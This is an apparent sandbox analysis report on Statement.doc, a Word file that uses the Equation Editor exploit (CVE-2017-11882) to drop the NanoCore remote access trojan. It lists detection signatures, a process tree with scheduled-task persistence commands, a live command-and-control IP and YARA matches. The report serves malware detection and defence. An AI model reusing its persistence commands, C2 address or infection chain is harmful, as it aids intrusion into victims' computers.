Play interactive tour

Edit tour

Analysis Report Statement.doc

Overview

General Information

Sample Name:	Statement.doc
Analysis ID:	345151
MD5:	854716b6ff05f02534960443c94340a1
SHA1:	6955e99f687a65747a95745b721c43543f3cf389
SHA256:	1421f7c867ff97c915fab1236fe5277b3116b426c0102f805fab25ef19fc681c
Tags:	doc
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Yara detected Nanocore RAT

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Contains functionality to hide a thread from the debugger

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2284 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2424 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

JNM.exe (PID: 1692 cmdline: C:\Users\user\AppData\Roaming\JNM.exe MD5: 10D30AD1922421E73E133AD020DF424F)

cmd.exe (PID: 1780 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)

timeout.exe (PID: 2336 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)

JNM.exe (PID: 2304 cmdline: C:\Users\user\AppData\Roaming\JNM.exe MD5: 10D30AD1922421E73E133AD020DF424F)

schtasks.exe (PID: 2808 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

schtasks.exe (PID: 2476 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

taskeng.exe (PID: 2464 cmdline: taskeng.exe {C7405FE6-0EEB-43B9-A9C9-0A01615FAA8D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

JNM.exe (PID: 2360 cmdline: C:\Users\user\AppData\Roaming\JNM.exe 0 MD5: 10D30AD1922421E73E133AD020DF424F)

cmd.exe (PID: 1360 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)

timeout.exe (PID: 1480 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)

JNM.exe (PID: 2220 cmdline: C:\Users\user\AppData\Roaming\JNM.exe MD5: 10D30AD1922421E73E133AD020DF424F)

smtpsvc.exe (PID: 3012 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 10D30AD1922421E73E133AD020DF424F)

cmd.exe (PID: 1836 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)

timeout.exe (PID: 1336 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)

smtpsvc.exe (PID: 1976 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 10D30AD1922421E73E133AD020DF424F)

EQNEDT32.EXE (PID: 2176 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Configuration

Threatname: NanoCore

{"C2: ": ["46.243.219.32"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24b0f:$a: NanoCore 0x24b68:$a: NanoCore 0x24ba5:$a: NanoCore 0x24c1e:$a: NanoCore 0x24b71:$b: ClientPlugin 0x24bae:$b: ClientPlugin 0x254ac:$b: ClientPlugin 0x254b9:$b: ClientPlugin 0x1ac9c:$e: KeepAlive 0x24ff9:$g: LogClientMessage 0x24f79:$i: get_Connected 0x14f45:$j: #=q 0x14f75:$j: #=q 0x14fb1:$j: #=q 0x14fd9:$j: #=q 0x15009:$j: #=q 0x15039:$j: #=q 0x15069:$j: #=q 0x15099:$j: #=q 0x150b5:$j: #=q 0x150e5:$j: #=q
0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10a85:$x1: NanoCore.ClientPluginHost 0x43aa5:$x1: NanoCore.ClientPluginHost 0x768c5:$x1: NanoCore.ClientPluginHost 0x10ac2:$x2: IClientNetworkHost 0x43ae2:$x2: IClientNetworkHost 0x76902:$x2: IClientNetworkHost 0x145f5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x47615:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7a435:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x107ed:$a: NanoCore 0x107fd:$a: NanoCore 0x10a31:$a: NanoCore 0x10a45:$a: NanoCore 0x10a85:$a: NanoCore 0x4380d:$a: NanoCore 0x4381d:$a: NanoCore 0x43a51:$a: NanoCore 0x43a65:$a: NanoCore 0x43aa5:$a: NanoCore 0x7662d:$a: NanoCore 0x7663d:$a: NanoCore 0x76871:$a: NanoCore 0x76885:$a: NanoCore 0x768c5:$a: NanoCore 0x1084c:$b: ClientPlugin 0x10a4e:$b: ClientPlugin 0x10a8e:$b: ClientPlugin 0x4386c:$b: ClientPlugin 0x43a6e:$b: ClientPlugin 0x43aae:$b: ClientPlugin
00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3185:$a: NanoCore 0x31de:$a: NanoCore 0x321b:$a: NanoCore 0x3294:$a: NanoCore 0x1693f:$a: NanoCore 0x16954:$a: NanoCore 0x16989:$a: NanoCore 0x2f93b:$a: NanoCore 0x2f950:$a: NanoCore 0x2f985:$a: NanoCore 0x31e7:$b: ClientPlugin 0x3224:$b: ClientPlugin 0x3b22:$b: ClientPlugin 0x3b2f:$b: ClientPlugin 0x166fb:$b: ClientPlugin 0x16716:$b: ClientPlugin 0x16746:$b: ClientPlugin 0x1695d:$b: ClientPlugin 0x16992:$b: ClientPlugin 0x2f6f7:$b: ClientPlugin 0x2f712:$b: ClientPlugin
00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x43185:$a: NanoCore 0x431de:$a: NanoCore 0x4321b:$a: NanoCore 0x43294:$a: NanoCore 0x5693f:$a: NanoCore 0x56954:$a: NanoCore 0x56989:$a: NanoCore 0x6f93b:$a: NanoCore 0x6f950:$a: NanoCore 0x6f985:$a: NanoCore 0x431e7:$b: ClientPlugin 0x43224:$b: ClientPlugin 0x43b22:$b: ClientPlugin 0x43b2f:$b: ClientPlugin 0x566fb:$b: ClientPlugin 0x56716:$b: ClientPlugin 0x56746:$b: ClientPlugin 0x5695d:$b: ClientPlugin 0x56992:$b: ClientPlugin 0x6f6f7:$b: ClientPlugin 0x6f712:$b: ClientPlugin
00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10a85:$x1: NanoCore.ClientPluginHost 0x43aa5:$x1: NanoCore.ClientPluginHost 0x768c5:$x1: NanoCore.ClientPluginHost 0x10ac2:$x2: IClientNetworkHost 0x43ae2:$x2: IClientNetworkHost 0x76902:$x2: IClientNetworkHost 0x145f5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x47615:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7a435:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x107ed:$a: NanoCore 0x107fd:$a: NanoCore 0x10a31:$a: NanoCore 0x10a45:$a: NanoCore 0x10a85:$a: NanoCore 0x4380d:$a: NanoCore 0x4381d:$a: NanoCore 0x43a51:$a: NanoCore 0x43a65:$a: NanoCore 0x43aa5:$a: NanoCore 0x7662d:$a: NanoCore 0x7663d:$a: NanoCore 0x76871:$a: NanoCore 0x76885:$a: NanoCore 0x768c5:$a: NanoCore 0x1084c:$b: ClientPlugin 0x10a4e:$b: ClientPlugin 0x10a8e:$b: ClientPlugin 0x4386c:$b: ClientPlugin 0x43a6e:$b: ClientPlugin 0x43aae:$b: ClientPlugin
00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x43185:$a: NanoCore 0x431de:$a: NanoCore 0x4321b:$a: NanoCore 0x43294:$a: NanoCore 0x5693f:$a: NanoCore 0x56954:$a: NanoCore 0x56989:$a: NanoCore 0x6f93b:$a: NanoCore 0x6f950:$a: NanoCore 0x6f985:$a: NanoCore 0x431e7:$b: ClientPlugin 0x43224:$b: ClientPlugin 0x43b22:$b: ClientPlugin 0x43b2f:$b: ClientPlugin 0x566fb:$b: ClientPlugin 0x56716:$b: ClientPlugin 0x56746:$b: ClientPlugin 0x5695d:$b: ClientPlugin 0x56992:$b: ClientPlugin 0x6f6f7:$b: ClientPlugin 0x6f712:$b: ClientPlugin
00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24aab:$a: NanoCore 0x24b04:$a: NanoCore 0x24b41:$a: NanoCore 0x24bba:$a: NanoCore 0x24b0d:$b: ClientPlugin 0x24b4a:$b: ClientPlugin 0x25448:$b: ClientPlugin 0x25455:$b: ClientPlugin 0x1ac38:$e: KeepAlive 0x24f95:$g: LogClientMessage 0x24f15:$i: get_Connected 0x14ee1:$j: #=q 0x14f11:$j: #=q 0x14f4d:$j: #=q 0x14f75:$j: #=q 0x14fa5:$j: #=q 0x14fd5:$j: #=q 0x15005:$j: #=q 0x15035:$j: #=q 0x15051:$j: #=q 0x15081:$j: #=q
00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x101b5:$x1: NanoCore.ClientPluginHost 0x431d5:$x1: NanoCore.ClientPluginHost 0x75ff5:$x1: NanoCore.ClientPluginHost 0x101f2:$x2: IClientNetworkHost 0x43212:$x2: IClientNetworkHost 0x76032:$x2: IClientNetworkHost 0x13d25:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46d45:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x79b65:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff1d:$a: NanoCore 0xff2d:$a: NanoCore 0x10161:$a: NanoCore 0x10175:$a: NanoCore 0x101b5:$a: NanoCore 0x42f3d:$a: NanoCore 0x42f4d:$a: NanoCore 0x43181:$a: NanoCore 0x43195:$a: NanoCore 0x431d5:$a: NanoCore 0x75d5d:$a: NanoCore 0x75d6d:$a: NanoCore 0x75fa1:$a: NanoCore 0x75fb5:$a: NanoCore 0x75ff5:$a: NanoCore 0xff7c:$b: ClientPlugin 0x1017e:$b: ClientPlugin 0x101be:$b: ClientPlugin 0x42f9c:$b: ClientPlugin 0x4319e:$b: ClientPlugin 0x431de:$b: ClientPlugin
Process Memory Space: JNM.exe PID: 1692	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x7ce586:$x1: NanoCore.ClientPluginHost 0x7ed7f9:$x1: NanoCore.ClientPluginHost 0x80c96c:$x1: NanoCore.ClientPluginHost 0x7ce5e7:$x2: IClientNetworkHost 0x7ed85a:$x2: IClientNetworkHost 0x80c9cd:$x2: IClientNetworkHost 0x7d39ec:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7e195e:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7f2c5f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x800bd1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x811dd2:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x81fd44:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: JNM.exe PID: 1692	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: JNM.exe PID: 1692	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x7ce08b:$a: NanoCore 0x7ce0a7:$a: NanoCore 0x7ce202:$a: NanoCore 0x7ce211:$a: NanoCore 0x7ce4ea:$a: NanoCore 0x7ce516:$a: NanoCore 0x7ce586:$a: NanoCore 0x7ddfc8:$a: NanoCore 0x7ddfda:$a: NanoCore 0x7de016:$a: NanoCore 0x7ed2fe:$a: NanoCore 0x7ed31a:$a: NanoCore 0x7ed475:$a: NanoCore 0x7ed484:$a: NanoCore 0x7ed75d:$a: NanoCore 0x7ed789:$a: NanoCore 0x7ed7f9:$a: NanoCore 0x7fd23b:$a: NanoCore 0x7fd24d:$a: NanoCore 0x7fd289:$a: NanoCore 0x80c471:$a: NanoCore
Process Memory Space: JNM.exe PID: 2304	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xfcbc9:$x1: NanoCore.ClientPluginHost 0x15e2c4:$x1: NanoCore.ClientPluginHost 0x5f0d98:$x1: NanoCore.ClientPluginHost 0x5f6957:$x1: NanoCore.ClientPluginHost 0x607d04:$x1: NanoCore.ClientPluginHost 0x61515a:$x1: NanoCore.ClientPluginHost 0x61c4ee:$x1: NanoCore.ClientPluginHost 0xfcc2a:$x2: IClientNetworkHost 0x15e2ea:$x2: IClientNetworkHost 0x5f0dbe:$x2: IClientNetworkHost 0x5f699c:$x2: IClientNetworkHost 0x607d49:$x2: IClientNetworkHost 0x615180:$x2: IClientNetworkHost 0x61c533:$x2: IClientNetworkHost 0x10202f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x10ffa1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: JNM.exe PID: 2304	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: JNM.exe PID: 2304	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfc6ce:$a: NanoCore 0xfc6ea:$a: NanoCore 0xfc845:$a: NanoCore 0xfc854:$a: NanoCore 0xfcb2d:$a: NanoCore 0xfcb59:$a: NanoCore 0xfcbc9:$a: NanoCore 0x10c60b:$a: NanoCore 0x10c61d:$a: NanoCore 0x10c659:$a: NanoCore 0x15456d:$a: NanoCore 0x1545d5:$a: NanoCore 0x154729:$a: NanoCore 0x15e1b6:$a: NanoCore 0x15e257:$a: NanoCore 0x15e2c4:$a: NanoCore 0x15e385:$a: NanoCore 0x15f256:$a: NanoCore 0x15f2a9:$a: NanoCore 0x15f2e2:$a: NanoCore 0x15f355:$a: NanoCore
Process Memory Space: JNM.exe PID: 2360	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x32c7d0:$x1: NanoCore.ClientPluginHost 0x34ba43:$x1: NanoCore.ClientPluginHost 0x36abb6:$x1: NanoCore.ClientPluginHost 0x32c831:$x2: IClientNetworkHost 0x34baa4:$x2: IClientNetworkHost 0x36ac17:$x2: IClientNetworkHost 0x331c36:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x33fba8:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x350ea9:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x35ee1b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x37001c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x37df8e:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: JNM.exe PID: 2360	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: JNM.exe PID: 2360	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x32c2d5:$a: NanoCore 0x32c2f1:$a: NanoCore 0x32c44c:$a: NanoCore 0x32c45b:$a: NanoCore 0x32c734:$a: NanoCore 0x32c760:$a: NanoCore 0x32c7d0:$a: NanoCore 0x33c212:$a: NanoCore 0x33c224:$a: NanoCore 0x33c260:$a: NanoCore 0x34b548:$a: NanoCore 0x34b564:$a: NanoCore 0x34b6bf:$a: NanoCore 0x34b6ce:$a: NanoCore 0x34b9a7:$a: NanoCore 0x34b9d3:$a: NanoCore 0x34ba43:$a: NanoCore 0x35b485:$a: NanoCore 0x35b497:$a: NanoCore 0x35b4d3:$a: NanoCore 0x36a6bb:$a: NanoCore
Click to see the 38 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.JNM.exe.620000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
7.2.JNM.exe.620000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
7.2.JNM.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.2.JNM.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.2.JNM.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.JNM.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.2.JNM.exe.630000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
7.2.JNM.exe.630000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
7.2.JNM.exe.630000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
26.2.smtpsvc.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
